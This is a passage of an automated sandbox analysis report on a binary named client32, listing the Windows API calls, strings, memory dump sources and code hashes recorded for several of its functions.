                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                                                                                                                                                    • String ID: %s%s.bin$141700$clientinv.cpp$m_pDoInv == NULL
                                                                                                                                                                                                    • API String ID: 4180936305-2915144016
                                                                                                                                                                                                    • Opcode ID: f311d18d2f481ca5885ce355be75c6d4215bfffd3506407d5c18b0736edccc2f
                                                                                                                                                                                                    • Instruction ID: 6dff70f8b624139b5d8b9928b76f3118b4df96bcfaa22522713f30a32685b050
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f311d18d2f481ca5885ce355be75c6d4215bfffd3506407d5c18b0736edccc2f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D2181B5E00705AFD710DF65DC80BAAB7E4EB88758F10857DF825D7681E734A8008B55
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11141240: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
                                                                                                                                                                                                      • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
                                                                                                                                                                                                      • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11141FAE
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11141FC4
                                                                                                                                                                                                      • Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,76596610,?), ref: 1113F937
                                                                                                                                                                                                      • Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F957
                                                                                                                                                                                                      • Part of subcall function 1113F8A0: CloseHandle.KERNEL32(00000000), ref: 1113F95F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
                                                                                                                                                                                                    • String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
                                                                                                                                                                                                    • API String ID: 3779116287-2600120591
                                                                                                                                                                                                    • Opcode ID: 4e6b941dd91801a2435b4bb47ef9bd529b47744a684cc276ea5b71ac848a70c8
                                                                                                                                                                                                    • Instruction ID: b8eec695178ba2d1a937c5ef531141e0e56104a00a3206b9e8423c5fe1c12a7b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e6b941dd91801a2435b4bb47ef9bd529b47744a684cc276ea5b71ac848a70c8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9001D4B9E0122D66DB50DBB09D41FEBF7ACCB44608F1001E5ED0997181EE31BA448B95
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,771CC310,?,1110D1BD,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C53E
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11186026,000000FF), ref: 11104373
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111043C2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad$CreateEventwsprintf
                                                                                                                                                                                                    • String ID: Advapi32.dll$Wtsapi32.dll
                                                                                                                                                                                                    • API String ID: 3065521449-2390547818
                                                                                                                                                                                                    • Opcode ID: eb8ffa7d751a0fb838dc8276ecb5f60825835a81c539c39725b34b54d8106a16
                                                                                                                                                                                                    • Instruction ID: bbbd634f828a37cff571ede067cab351b0e944a9bc0c67eb03fa8c0f48524c6c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb8ffa7d751a0fb838dc8276ecb5f60825835a81c539c39725b34b54d8106a16
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 594114B5D09B449AC361CF6A8980BDAFBF8EFA9204F00494ED5AE93210D7787500CF51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,76596610,?), ref: 1113F937
                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F957
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1113F95F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateFile$CloseHandle
                                                                                                                                                                                                    • String ID: "
                                                                                                                                                                                                    • API String ID: 1443461169-123907689
                                                                                                                                                                                                    • Opcode ID: a2a77767078ddfce535248fde987ff7f5033cfdc2bfe7a17f5ba387350ad47bd
                                                                                                                                                                                                    • Instruction ID: 9c86450901ac288abfb1a5416e129d0f3cdd4120216def2344b537bfb16cbc1a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a2a77767078ddfce535248fde987ff7f5033cfdc2bfe7a17f5ba387350ad47bd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F421BE30A0426AAFE312CE38DD54BD9BB949F82324F2041E4F9D5DB1C8EA719A488752
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • inet_addr.WSOCK32(?,?,?,?,?,?,00002000,?,00000000), ref: 689B6691
                                                                                                                                                                                                    • gethostbyname.WSOCK32(?,?,?,?,?,?,00002000,?,00000000), ref: 689B66A2
                                                                                                                                                                                                    • WSAGetLastError.WSOCK32(?,?,?,?,?,?,00002000,?,00000000), ref: 689B66CD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Cannot resolve hostname %s, error %d, xrefs: 689B66D6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLastgethostbynameinet_addr
                                                                                                                                                                                                    • String ID: Cannot resolve hostname %s, error %d
                                                                                                                                                                                                    • API String ID: 2520508281-1802540647
                                                                                                                                                                                                    • Opcode ID: 0620cbce80b45ad5af9a467fe1fbed606f5c7602f9a43c356a99314e3e5ba716
                                                                                                                                                                                                    • Instruction ID: 32682fadb9d3bf818b356323f7034c36583894508ba72571f805ffd42c4f411a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0620cbce80b45ad5af9a467fe1fbed606f5c7602f9a43c356a99314e3e5ba716
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F21B736A006089BDB10DFB4DC40BAAB3FCBF59214F80C599E919D7280EF31E944CB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,BBC4A55B,?,?,?,Function_00186DCB,000000FF), ref: 1102CDC7
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                      • Part of subcall function 1110C520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,771CC310,?,1110D1BD,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C53E
                                                                                                                                                                                                    • CreateEventA.KERNEL32 ref: 1102CD8A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Event$Create$wsprintf
                                                                                                                                                                                                    • String ID: Client$DisableGeolocation
                                                                                                                                                                                                    • API String ID: 3257991914-4166767992
                                                                                                                                                                                                    • Opcode ID: a0e31b12da12a7498f8e628daecd04d7d44295960fafd86e3c528dcff422f91c
                                                                                                                                                                                                    • Instruction ID: 9819fa70e1002b3fd3fc9294db2adb66ebff135fc09b7afae45472fde2869809
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0e31b12da12a7498f8e628daecd04d7d44295960fafd86e3c528dcff422f91c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA21E474E41765ABE711CFD4CD46FAABBE5E708B08F0042AAF9159B3C0E7B574008B84
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11026E4A
                                                                                                                                                                                                      • Part of subcall function 110CBDD0: EnterCriticalSection.KERNEL32(00000000,00000000,765A83E0,76591970,76595C90,110F2499,?,?,?,?,?,?,?,?,110FFF09), ref: 110CBDEB
                                                                                                                                                                                                      • Part of subcall function 110CBDD0: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CBE18
                                                                                                                                                                                                      • Part of subcall function 110CBDD0: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CBE2A
                                                                                                                                                                                                      • Part of subcall function 110CBDD0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,110FFF09), ref: 110CBE34
                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 11026E60
                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 11026E66
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
                                                                                                                                                                                                    • String ID: Exit Msgloop, quit=%d
                                                                                                                                                                                                    • API String ID: 3212272093-2210386016
                                                                                                                                                                                                    • Opcode ID: e7dd9a0d6304e414837417c1496cf95b9c492c7d0ab5e24ee8a9f5cb138c621a
                                                                                                                                                                                                    • Instruction ID: e73fb029a48cead8081619cba9071100042b7f6ca482b6c8c9150014965f5db6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7dd9a0d6304e414837417c1496cf95b9c492c7d0ab5e24ee8a9f5cb138c621a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A001D476E0125E66EB12DBF5DC81F6FB7AD5B84718F904075EF1493189FB60B00487A2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1101761D
                                                                                                                                                                                                      • Part of subcall function 11017520: WaitForSingleObject.KERNEL32(00000304,000000FF), ref: 1101755C
                                                                                                                                                                                                      • Part of subcall function 11017520: CoInitialize.OLE32(00000000), ref: 11017565
                                                                                                                                                                                                      • Part of subcall function 11017520: CoUninitialize.COMBASE(00000001,?,?), ref: 110175F0
                                                                                                                                                                                                      • Part of subcall function 11017440: WaitForSingleObject.KERNEL32(00000304,000000FF), ref: 11017472
                                                                                                                                                                                                      • Part of subcall function 11017440: CoInitialize.OLE32(00000000), ref: 1101747B
                                                                                                                                                                                                      • Part of subcall function 11017440: CoUninitialize.COMBASE(00000001,?,?), ref: 11017500
                                                                                                                                                                                                    • SetEvent.KERNEL32(00000304), ref: 1101763D
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 11017643
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 1101764D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountInitializeObjectSingleTickUninitializeWait$Event
                                                                                                                                                                                                    • String ID: touchkbd, systype=%d, chassis=%d, took %d ms
                                                                                                                                                                                                    • API String ID: 3357037191-4122679463
                                                                                                                                                                                                    • Opcode ID: 6fb4c883c76aea1f2d5b3d6f188dc251cbcdc853b11f71871790596908a8fc6c
                                                                                                                                                                                                    • Instruction ID: 79165456b83758217f0e3ba606bc8870e55e265f2da5a0662fe20fec16fd047e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6fb4c883c76aea1f2d5b3d6f188dc251cbcdc853b11f71871790596908a8fc6c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B4F0A0B2E00218ABD700EBF99C89EAEBB9CDB4431CB100076F904C7245E9A2BD1047B2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 689B5014
